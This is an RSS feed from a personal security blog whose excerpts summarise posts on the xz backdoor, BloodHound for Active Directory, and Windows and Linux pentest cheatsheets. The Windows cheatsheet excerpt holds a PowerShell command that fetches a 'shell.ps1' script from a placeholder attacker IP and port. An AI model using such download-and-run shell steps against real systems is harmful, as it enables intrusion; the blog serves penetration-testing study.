<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>tools on gkourgkoutas.net</title>
    <link>https://gkourgkoutas.net/en/tags/tools/</link>
    <description>Recent content in tools on gkourgkoutas.net</description>
    <generator>Hugo -- gohugo.io</generator>
    <lastBuildDate>Wed, 03 Apr 2024 15:50:59 +0900</lastBuildDate><atom:link href="https://gkourgkoutas.net/en/tags/tools/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>xz</title>
      <link>https://gkourgkoutas.net/en/posts/xz/</link>
      <pubDate>Wed, 03 Apr 2024 15:50:59 +0900</pubDate>
      
      <guid>https://gkourgkoutas.net/en/posts/xz/</guid>
      <description>For various reasons I wasn&amp;rsquo;t able to write a summary for 2023. But if I had known then what to expect in 2024 with the current xz/liblzma1, I would have written a modified version of Wilhelm Hey&amp;rsquo;s &amp;ldquo;Alle Jahre wieder&amp;rdquo;2 instead of the recap.
As for the vulnerability itself, there are already a number of blogs on the subject, the best known being by Evan Boehs3 and Bruce Schneier4.
My two cents?</description>
    </item>
    
    <item>
      <title>BloodHound Part II</title>
      <link>https://gkourgkoutas.net/en/posts/bloodhound-part-2/</link>
      <pubDate>Mon, 15 Nov 2021 18:37:00 +0100</pubDate>
      
      <guid>https://gkourgkoutas.net/en/posts/bloodhound-part-2/</guid>
      <description>The first part of my BloodHound post was about the setup and usage of the tool. This part will mainly focous on the built-in queries and some small tips and tricks. I think the only way to fully grasp BloodHound is by frequently using it.
Built-in queries After dumping our raw data with SharpHound1, it&amp;rsquo;s time to get to work. BH has some built-in queries which helps us to get a quick overview of the domain we are facing.</description>
    </item>
    
    <item>
      <title>Windows Cheatsheet</title>
      <link>https://gkourgkoutas.net/en/posts/windows-cheats/</link>
      <pubDate>Mon, 22 Mar 2021 19:21:03 +0100</pubDate>
      
      <guid>https://gkourgkoutas.net/en/posts/windows-cheats/</guid>
      <description>So this is the windows equivalent of my post about linux cheatsheets. A lot of the following commands are from labs, cheatsheets, writeups, from friends and colleagues, trial and error and also copied from famous places like hacktricks and ired.team.
I also have grepable cheatsheets to download on my GitHub.
Powershell Download from remote Webserver
PS&amp;gt; Invoke-WebRequest -Uri &amp;#34;http://&amp;lt;ip&amp;gt;:&amp;lt;port&amp;gt;/shell.ps1.&amp;#34; -OutFile &amp;#34;C:\path\file&amp;#34; With the following command, Powershell downloads the file and executes it immediately</description>
    </item>
    
    <item>
      <title>Linux Cheatsheet</title>
      <link>https://gkourgkoutas.net/en/posts/linux-cheats/</link>
      <pubDate>Sun, 21 Mar 2021 20:01:41 +0100</pubDate>
      
      <guid>https://gkourgkoutas.net/en/posts/linux-cheats/</guid>
      <description>Writing a full hands-on of BloodHound takes more time than I thought, hence Part II is going to be delayed until I&amp;rsquo;m fully satisfied with the results. Thus I thought I will share some of my Linux cheats which I use (mostly for enumeration and privilege escalation stuff). A lot of the following commands are from labs, cheatsheets, writeups, from friends and colleagues, trial and error and also copied from famous places like hacktricks and ired.</description>
    </item>
    
    <item>
      <title>BloodHound Part I</title>
      <link>https://gkourgkoutas.net/en/posts/bloodhound-part-1/</link>
      <pubDate>Sat, 20 Mar 2021 11:53:00 +0100</pubDate>
      
      <guid>https://gkourgkoutas.net/en/posts/bloodhound-part-1/</guid>
      <description>What is BloodHound?  BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a PowerShell ingestor.
  BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths.</description>
    </item>
    
  </channel>
</rss>
